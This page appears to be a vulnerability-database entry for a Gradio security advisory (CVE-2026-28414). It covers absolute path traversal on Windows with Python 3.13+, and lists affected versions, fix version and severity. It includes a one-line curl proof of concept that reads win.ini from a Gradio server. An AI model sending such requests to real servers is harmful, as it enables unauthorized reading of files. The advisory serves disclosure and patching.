GHSA-39MP-8HJ3-5C49

Vulnerability from github – Published: 2026-03-01 01:28 – Updated: 2026-03-01 01:28
VLAI?
Summary
Gradio is Vulnerable to Absolute Path Traversal on Windows with Python 3.13+
Details

Summary

Gradio apps running on Window with Python 3.13+ are vulnerable to an absolute path traversal issue that enables unauthenticated attackers to read arbitrary files from the file system.

Details

Python 3.13+ changed the definition of os.path.isabs so that root-relative paths like /windows/win.ini on Windows are no longer considered absolute paths, resulting in a vulnerability in Gradio's logic for joining paths safely.

This can be exploited by unauthenticated attackers to read arbitrary files from the Gradio server, even when Gradio is set up with authentication.

PoC

% curl http://10.10.10.10:7860/static//windows/win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Impact

Arbitrary file read in the context of the Windows user running Gradio.

Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "gradio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28414"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-36"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-01T01:28:41Z",
    "nvd_published_at": "2026-02-27T22:16:24Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nGradio apps running on Window with Python 3.13+ are vulnerable to an absolute path traversal issue that enables unauthenticated attackers to read arbitrary files from the file system.\n\n### Details\nPython 3.13+ changed the definition of `os.path.isabs` so that root-relative paths like `/windows/win.ini` on Windows are no longer considered absolute paths, resulting in a vulnerability in Gradio\u0027s logic for joining paths safely.\n\nThis can be exploited by unauthenticated attackers to read arbitrary files from the Gradio server, even when Gradio is set up with authentication.\n\n### PoC\n```\n% curl http://10.10.10.10:7860/static//windows/win.ini\n; for 16-bit app support\n[fonts]\n[extensions]\n[mci extensions]\n[files]\n[Mail]\nMAPI=1\n```\n\n### Impact\nArbitrary file read in the context of the Windows user running Gradio.",
  "id": "GHSA-39mp-8hj3-5c49",
  "modified": "2026-03-01T01:28:41Z",
  "published": "2026-03-01T01:28:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-39mp-8hj3-5c49"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28414"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gradio-app/gradio/commit/6011b00d0154b85532fa901dd73cf8fa7d86fd04"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gradio-app/gradio"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gradio is Vulnerable to Absolute Path Traversal on Windows with Python 3.13+"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.